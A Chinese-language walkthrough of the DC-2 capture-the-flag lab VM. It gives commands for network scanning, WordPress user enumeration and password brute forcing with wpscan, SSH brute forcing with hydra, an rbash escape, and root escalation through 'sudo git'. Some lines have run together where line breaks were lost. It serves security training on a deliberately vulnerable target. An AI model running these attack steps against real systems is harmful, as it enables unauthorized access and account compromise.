一、靶机环境搭建
1.下载DC-2虚拟机镜像文件,解压后用VM打开。
DC-2镜像,若链接失效,关注公众号 文化仁 回复DC-2获取,或联系我获取https://pan.baidu.com/s/1gVVdEbiTkFUEOpewsn1iRg?pwd=2t1j
2.设置DC-2虚拟机的网络适配器为NAT模式,并查看其MAC硬件地址,重启后生效。
3.开启kali虚拟机
二、渗透前的信息收集
1.在kali系统中使用nmap工具扫描本网段的机器。
# nmap -sP 192.168.2.0/24**
根据扫描结果比对MAC地址可知DC-2获取到的IP地址为192.168.2.9。
2.根据IP地址对其进一步收集信息,使用nmap工具扫描其开放的端口以及开放的服务。
# nmap -A 192.168.2.9 -p 1-65535 -oN nmap.A
根据扫描结果可知,开放80、7744端口,尝试访问其IP,发现连接失败
3.添加一条本地DNS,使DC-2可以被解析为IP。
# vi /etc/hosts
再次访问
三、正式进行渗透
FLAG1
根据提示,使用cewl工具
# cewl dc-2 > pwd.dic
扫描一下网站目录,使用MSF进行网站目录扫描
# msfconsole
msf6 > use auxiliary/scanner/http/dir_scanner msf6 auxiliary(scanner/http/dir_scanner) > options
根据选项提示,设置RHOSTS目标机器IP地址
msf6 auxiliary(scanner/http/dir_scanner) > set rhosts 192.168.2.9rhostsmsf6 auxiliary(scanner/http/dir_scanner) > set threads 50threads => 50
msf6 auxiliary(scanner/http/dir_scanner) > exploit
使用wpscan漏洞扫描工具,更新wpscan
# wpscan --update
注:如果wpscan无法使用,可以尝试更换新的kali 虚拟机,安装 kali 2024.2 之后,wpscan启动成功。
# wpscan --url dc-2 -e u
wpscan 爆破用户
# wpscan --url dc-2 -U user.dic -P pwd.dic
FLAG2
访问192.168.2.9/wp-admin,使用jerry用户并用我们爆破出来的密码尝试登录。
找到flag2
根据提示我们需要另辟蹊径,想到刚开始使用nmap 扫描时,还扫出了ssh 端口7744。
利用hydra爆破ssh
# hydra -L user.dic -P pwd.dic ssh:**//192.168.2.9 -s 7744 -o hydra.ssh -vV**
查看结果:
尝试使用ssh 登录
ssh tom@192.168.2.9 -p 7744
查看当前目录文件
lscat flag3.txt
发现有rbash 命令限制
FLAG3
绕过限制
BASH_CMDS[a]=/bin/sh;a/bin/bashexport PATH=$PATH:/bin/export PATH=$PATH:/usr/bin
FLAG4
切换jerry用户
su - jerry
进入到jerry用户的家目录
执行命令,发现没有权限
FINAL-FLAG
提权,查看具有root权限的命令
sudo -l
发现git命令具有root权限,但是不需要提供给root密码。
git提权
sudo git -p --help
强制进入交互式状态,让页面缓冲区无法显示全部信息。
!/bin/bash